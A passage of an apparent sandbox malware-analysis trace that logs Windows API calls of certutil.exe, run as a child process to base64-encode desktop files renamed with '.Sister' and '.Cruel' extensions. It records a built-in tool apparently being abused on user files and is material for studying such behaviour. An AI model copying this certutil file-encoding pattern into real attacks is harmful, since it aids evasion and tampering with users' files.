(_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0270.420] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0270.420] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0270.420] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0270.421] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xf04a6cedc8 | out: phkResult=0xf04a6cedc8*=0x23c) returned 0x0 [0270.421] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x25286b49180 [0270.421] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xf04a6cf338, lpData=0xf04a6cf368, lpcbData=0xf04a6cf330*=0x4 | out: lpType=0xf04a6cf338*=0x0, lpData=0xf04a6cf368*=0x0, lpcbData=0xf04a6cf330*=0x4) returned 0x2 [0270.421] LocalFree (hMem=0x25286b49180) returned 0x0 [0270.421] RegCloseKey (hKey=0x23c) returned 0x0 [0270.421] LocalFree (hMem=0x0) returned 0x0 [0270.421] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x25286b6cce0 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0270.469] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0270.469] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0270.470] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0270.470] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0270.470] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x25286b71c30 [0270.470] GetComputerNameW (in: lpBuffer=0x25286b71c30, nSize=0xf04a6cf330 | out: lpBuffer="NQDPDE", nSize=0xf04a6cf330) returned 1 [0270.470] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xf04a6cf300 | out: lpBuffer=0x0, nSize=0xf04a6cf300) returned 0 [0270.470] GetLastError () returned 0xea [0270.470] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x25286b5b7e0 [0270.470] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x25286b5b7e0, nSize=0xf04a6cf300 | out: lpBuffer="NQdPdE", nSize=0xf04a6cf300) returned 1 [0270.471] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0270.475] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x25286b71e20, cbCertEncoded=0xf9ba) returned 0x0 [0270.479] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x25286b71e20, cbCrlEncoded=0xf9ba) returned 0x0 [0270.481] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x25286b71e20, cbEncoded=0xf9ba, dwFlags=0x8000, pDecodePara=0xf04a6cf1e0, pvStructInfo=0xf04a6cf270, pcbStructInfo=0xf04a6cf264 | out: pvStructInfo=0xf04a6cf270, pcbStructInfo=0xf04a6cf264) returned 0 [0270.481] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x25286b71e20, cbEncoded=0xf9ba, dwFlags=0x8000, pDecodePara=0xf04a6cf1e0, pvStructInfo=0xf04a6cf270, pcbStructInfo=0xf04a6cf264 | out: pvStructInfo=0xf04a6cf270, pcbStructInfo=0xf04a6cf264) returned 0 [0270.481] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x25286b71e20, cbEncoded=0xf9ba, dwFlags=0x8000, pDecodePara=0xf04a6cf1e0, pvStructInfo=0xf04a6cf270, pcbStructInfo=0xf04a6cf264 | out: pvStructInfo=0xf04a6cf270, pcbStructInfo=0xf04a6cf264) returned 0 [0270.482] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x25286b556b0 [0270.491] CryptMsgUpdate (hCryptMsg=0x25286b556b0, pbData=0x25286b71e20, cbData=0xf9ba, fFinal=1) returned 0 [0270.492] GetLastError () returned 0x8009310b [0270.492] CryptMsgClose (hCryptMsg=0x25286b556b0) returned 1 [0270.492] GetFileAttributesExW (in: lpFileName="YgF_fsDPEPZ_A1NWq.png.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\ygf_fsdpepz_a1nwq.png.sister"), fInfoLevelId=0x0, lpFileInformation=0xf04a6cf290 | out: lpFileInformation=0xf04a6cf290*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687668f0, ftCreationTime.dwHighDateTime=0x1d5ee07, ftLastAccessTime.dwLowDateTime=0x30f0edd0, ftLastAccessTime.dwHighDateTime=0x1d5eb4e, ftLastWriteTime.dwLowDateTime=0x30f0edd0, ftLastWriteTime.dwHighDateTime=0x1d5eb4e, nFileSizeHigh=0x0, nFileSizeLow=0xf9ba)) returned 1 [0270.492] _vsnwprintf (in: _Buffer=0xf04a6cf298, _BufferCount=0xb, _Format="%d", _ArgList=0xf04a6cf288 | out: _Buffer="359") returned 3 [0270.492] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xf04a6cf050, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0270.492] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x25286b71b40 [0270.492] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0270.492] _vsnwprintf (in: _Buffer=0xf04a6ce280, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xf04a6cf2d8 | out: _Buffer="Input Length = 63930") returned 20 [0270.492] GetFileType (hFile=0x50) returned 0x2 [0270.492] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf04a6ce280*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xf04a6ce234, lpReserved=0x0 | out: lpBuffer=0xf04a6ce280*, lpNumberOfCharsWritten=0xf04a6ce234*=0x14) returned 1 [0270.563] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0270.563] _vsnwprintf (in: _Buffer=0xf04a6ce280, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf04a6cf2d8 | out: _Buffer="\n") returned 1 [0270.564] GetFileType (hFile=0x50) returned 0x2 [0270.564] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf04a6ce280*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf04a6ce234, lpReserved=0x0 | out: lpBuffer=0xf04a6ce280*, lpNumberOfCharsWritten=0xf04a6ce234*=0x1) returned 1 [0270.775] GetFileAttributesExW (in: lpFileName="YgF_fsDPEPZ_A1NWq.png.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\ygf_fsdpepz_a1nwq.png.cruel"), fInfoLevelId=0x0, lpFileInformation=0xf04a6cf290 | out: lpFileInformation=0xf04a6cf290*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbf2c395, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xcbf2c395, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xcbf9c7e7, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x15798)) returned 1 [0270.775] _vsnwprintf (in: _Buffer=0xf04a6cf298, _BufferCount=0xb, _Format="%d", _ArgList=0xf04a6cf288 | out: _Buffer="361") returned 3 [0270.775] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xf04a6cf050, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0270.775] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x25286b71ba0 [0270.775] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0270.775] _vsnwprintf (in: _Buffer=0xf04a6ce280, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xf04a6cf2d8 | out: _Buffer="Output Length = 87960") returned 21 [0270.775] GetFileType (hFile=0x50) returned 0x2 [0270.776] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf04a6ce280*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xf04a6ce234, lpReserved=0x0 | out: lpBuffer=0xf04a6ce280*, lpNumberOfCharsWritten=0xf04a6ce234*=0x15) returned 1 [0270.858] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0270.858] _vsnwprintf (in: _Buffer=0xf04a6ce280, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf04a6cf2d8 | out: _Buffer="\n") returned 1 [0270.858] GetFileType (hFile=0x50) returned 0x2 [0270.858] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf04a6ce280*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf04a6ce234, lpReserved=0x0 | out: lpBuffer=0xf04a6ce280*, lpNumberOfCharsWritten=0xf04a6ce234*=0x1) returned 1 [0270.935] LocalFree (hMem=0x25286b71e20) returned 0x0 [0270.935] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0270.936] _vsnwprintf (in: _Buffer=0xf04a6cf2f8, _BufferCount=0xb, _Format="%d", _ArgList=0xf04a6cf2e8 | out: _Buffer="2022") returned 4 [0270.936] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xf04a6cf0b0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0270.936] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x25286b48c20 [0270.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0270.936] _vsnwprintf (in: _Buffer=0xf04a6ce2e0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xf04a6cf338 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0270.936] GetFileType (hFile=0x50) returned 0x2 [0270.936] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf04a6ce2e0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xf04a6ce294, lpReserved=0x0 | out: lpBuffer=0xf04a6ce2e0*, lpNumberOfCharsWritten=0xf04a6ce294*=0x31) returned 1 [0271.050] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0271.051] _vsnwprintf (in: _Buffer=0xf04a6ce2e0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf04a6cf338 | out: _Buffer="\n") returned 1 [0271.051] GetFileType (hFile=0x50) returned 0x2 [0271.051] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf04a6ce2e0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf04a6ce294, lpReserved=0x0 | out: lpBuffer=0xf04a6ce2e0*, lpNumberOfCharsWritten=0xf04a6ce294*=0x1) returned 1 [0271.126] LocalFree (hMem=0x0) returned 0x0 [0271.127] LocalFree (hMem=0x25286b44430) returned 0x0 [0271.127] LocalFree (hMem=0x25286b4f350) returned 0x0 [0271.127] SetLastError (dwErrCode=0x80070716) [0271.127] _vsnwprintf (in: _Buffer=0xf04a6cf368, _BufferCount=0xb, _Format="%d", _ArgList=0xf04a6cf358 | out: _Buffer="511") returned 3 [0271.127] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xf04a6cf120, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0271.127] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x25286b719f0 [0271.127] PostQuitMessage (nExitCode=0) [0271.128] GetMessageW (in: lpMsg=0xf04a6cf960, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf04a6cf960) returned 0 [0271.128] LocalFree (hMem=0x25286b5b7e0) returned 0x0 [0271.128] LocalFree (hMem=0x25286b71c30) returned 0x0 [0271.128] LocalFree (hMem=0x0) returned 0x0 [0271.128] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0271.129] GetLastError () returned 0x7e [0271.129] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0271.130] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0271.130] DllMain () returned 0x1 [0271.130] LocalFree (hMem=0x25286b5ba00) returned 0x0 [0271.130] LocalFree (hMem=0x25286b4bd20) returned 0x0 [0271.130] LocalFree (hMem=0x25286b71b40) returned 0x0 [0271.130] LocalFree (hMem=0x25286b71ba0) returned 0x0 [0271.130] LocalFree (hMem=0x25286b48c20) returned 0x0 [0271.130] LocalFree (hMem=0x25286b719f0) returned 0x0 [0271.130] LocalFree (hMem=0x25286b542e0) returned 0x0 [0271.130] LocalFree (hMem=0x25286b4bae0) returned 0x0 [0271.130] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0271.130] GetLastError () returned 0x7e [0271.130] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0271.131] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0271.131] DllMain () returned 0x1 [0271.131] exit (_Code=0) Thread: id = 99 os_tid = 0x1238 Process: id = "37" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x22e68000" os_pid = "0x123c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"yLW8a6BSku30pNN.csv.Sister\" \"yLW8a6BSku30pNN.csv.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 100 os_tid = 0x1334 [0273.282] GetStartupInfoW (in: lpStartupInfo=0x9565bafeb0 | out: lpStartupInfo=0x9565bafeb0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"yLW8a6BSku30pNN.csv.Sister\" \"yLW8a6BSku30pNN.csv.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0273.284] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0273.284] __set_app_type (_Type=0x1) [0273.284] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0273.286] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0273.289] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0273.289] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0273.290] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0273.290] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0273.290] WerSetFlags () returned 0x0 [0273.291] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0273.291] __iob_func () returned 0x7ffcea2dea00 [0273.291] _fileno (_File=0x7ffcea2dea30) returned 1 [0273.291] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0273.291] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0273.294] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0273.294] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0273.294] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0273.295] GetConsoleOutputCP () returned 0x1b5 [0273.365] _vsnwprintf (in: _Buffer=0x9565bafe20, _BufferCount=0xb, _Format=".%d", _ArgList=0x9565bafd48 | out: _Buffer=".437") returned 4 [0273.366] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0273.366] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0273.366] GetFileType (hFile=0x50) returned 0x2 [0273.366] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0273.366] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0273.367] SetThreadUILanguage (LangId=0x0) returned 0x409 [0273.447] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0273.447] GetCommandLineW () returned="certutil -encode \"yLW8a6BSku30pNN.csv.Sister\" \"yLW8a6BSku30pNN.csv.Cruel\"" [0273.447] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x237ce84b950 [0273.447] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x237ce83d090 [0273.447] LocalFree (hMem=0x237ce84b950) returned 0x0 [0273.447] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x237ce841ef0 [0273.447] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x237ce841e30 [0273.447] LocalFree (hMem=0x237ce841ef0) returned 0x0 [0273.447] LocalFree (hMem=0x237ce83d090) returned 0x0 [0273.447] LocalFree (hMem=0x0) returned 0x0 [0273.447] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0273.447] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0273.449] GetCommandLineW () returned="certutil -encode \"yLW8a6BSku30pNN.csv.Sister\" \"yLW8a6BSku30pNN.csv.Cruel\"" [0273.449] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x237ce84b6f0 [0273.449] GetSystemTime (in: lpSystemTime=0x9565bafb10 | out: lpSystemTime=0x9565bafb10*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x3dd)) [0273.449] SystemTimeToFileTime (in: lpSystemTime=0x9565bafb10, lpFileTime=0x9565bafb08 | out: lpFileTime=0x9565bafb08) returned 1 [0273.449] FileTimeToLocalFileTime (in: lpFileTime=0x9565bafb08, lpLocalFileTime=0x9565bafad0 | out: lpLocalFileTime=0x9565bafad0) returned 1 [0273.449] FileTimeToSystemTime (in: lpFileTime=0x9565bafad0, lpSystemTime=0x9565baf840 | out: lpSystemTime=0x9565baf840) returned 1 [0273.449] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x9565baf840, lpFormat=0x0, lpDateStr=0x9565baf950, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0273.449] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x9565baf840, lpFormat=0x0, lpTimeStr=0x9565baf850, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0273.449] _vsnwprintf (in: _Buffer=0x9565baf85e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x9565baf828 | out: _Buffer=" 47.989s") returned 8 [0273.450] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x237ce84df50 [0273.450] SetLastError (dwErrCode=0x80070716) [0273.450] _vsnwprintf (in: _Buffer=0x9565baf8d8, _BufferCount=0xb, _Format="%d", _ArgList=0x9565baf8c8 | out: _Buffer="948") returned 3 [0273.450] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x9565baf690, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0273.450] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x237ce84b910 [0273.450] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x237ce844210 [0273.451] LocalFree (hMem=0x237ce84df50) returned 0x0 [0273.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x9565bafb80 | out: lpSystemTimeAsFileTime=0x9565bafb80*(dwLowDateTime=0xcd991cd1, dwHighDateTime=0x1d6141f)) [0273.451] GetLocalTime (in: lpSystemTime=0x9565bafbb8 | out: lpSystemTime=0x9565bafbb8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x2f, wMilliseconds=0x3df)) [0273.451] SystemTimeToFileTime (in: lpSystemTime=0x9565bafbb8, lpFileTime=0x9565bafb90 | out: lpFileTime=0x9565bafb90) returned 1 [0273.451] CompareFileTime (lpFileTime1=0x9565bafb90, lpFileTime2=0x9565bafb80) returned 1 [0273.451] _vsnwprintf (in: _Buffer=0x9565bafbc8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x9565bafb58 | out: _Buffer="GMT + 2.00") returned 10 [0273.451] LocalFree (hMem=0x237ce84b6f0) returned 0x0 [0273.451] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0273.452] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0273.452] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0273.452] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0273.452] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0273.452] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x9565bafbf8 | out: _Buffer="10.0.15063.447") returned 14 [0273.452] GetACP () returned 0x4e4 [0273.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0273.452] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x237ce84b6f0 [0273.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x237ce84b6f0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0273.452] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x237ce84e350 [0273.452] _vsnwprintf (in: _Buffer=0x237ce84e350, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x9565bafc48 | out: _Buffer="10.0.15063.447 retail") returned 21 [0273.452] LocalFree (hMem=0x237ce84b6f0) returned 0x0 [0273.452] LocalFree (hMem=0x0) returned 0x0 [0273.452] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0273.452] GetACP () returned 0x4e4 [0273.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0273.452] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x237ce84b830 [0273.453] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x237ce84b830, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0273.453] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x237ce84ddd0 [0273.453] _vsnwprintf (in: _Buffer=0x237ce84ddd0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x9565bafc48 | out: _Buffer="10.0.15063.447 retail") returned 21 [0273.453] LocalFree (hMem=0x237ce84b830) returned 0x0 [0273.453] LocalFree (hMem=0x0) returned 0x0 [0273.453] GetACP () returned 0x4e4 [0273.453] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0273.453] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x237ce84b830 [0273.453] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x237ce84b830, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0273.453] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x237ce84de10 [0273.453] _vsnwprintf (in: _Buffer=0x237ce84de10, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x9565bafc78 | out: _Buffer="10.0.15063.447 retailEAUT") returned 21 [0273.453] LocalFree (hMem=0x237ce84b830) returned 0x0 [0273.453] LocalFree (hMem=0x237ce84e350) returned 0x0 [0273.453] LocalFree (hMem=0x237ce84ddd0) returned 0x0 [0273.453] LocalFree (hMem=0x237ce84de10) returned 0x0 [0273.453] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0273.454] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0273.454] GetStockObject (i=0) returned 0x900010 [0273.454] RegisterClassW (lpWndClass=0x9565bafda0) returned 0xc1a2 [0273.455] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1e02c8 [0273.582] NtdllDefWindowProc_W () returned 0x0 [0273.583] NtdllDefWindowProc_W () returned 0x1 [0273.633] NtdllDefWindowProc_W () returned 0x0 [0273.642] UpdateWindow (hWnd=0x1e02c8) returned 1 [0273.642] PostMessageW (hWnd=0x1e02c8, Msg=0x400, wParam=0x0, lParam=0x237ce83217e) returned 1 [0273.642] GetMessageW (in: lpMsg=0x9565bafdf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x9565bafdf0) returned 1 [0273.642] TranslateMessage (lpMsg=0x9565bafdf0) returned 0 [0273.642] DispatchMessageW (lpMsg=0x9565bafdf0) returned 0x0 [0273.642] NtdllDefWindowProc_W () returned 0x0 [0273.642] GetMessageW (in: lpMsg=0x9565bafdf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x9565bafdf0) returned 1 [0273.642] TranslateMessage (lpMsg=0x9565bafdf0) returned 0 [0273.642] DispatchMessageW (lpMsg=0x9565bafdf0) returned 0x0 [0273.642] LocalAlloc (uFlags=0x0, uBytes=0x82) returned 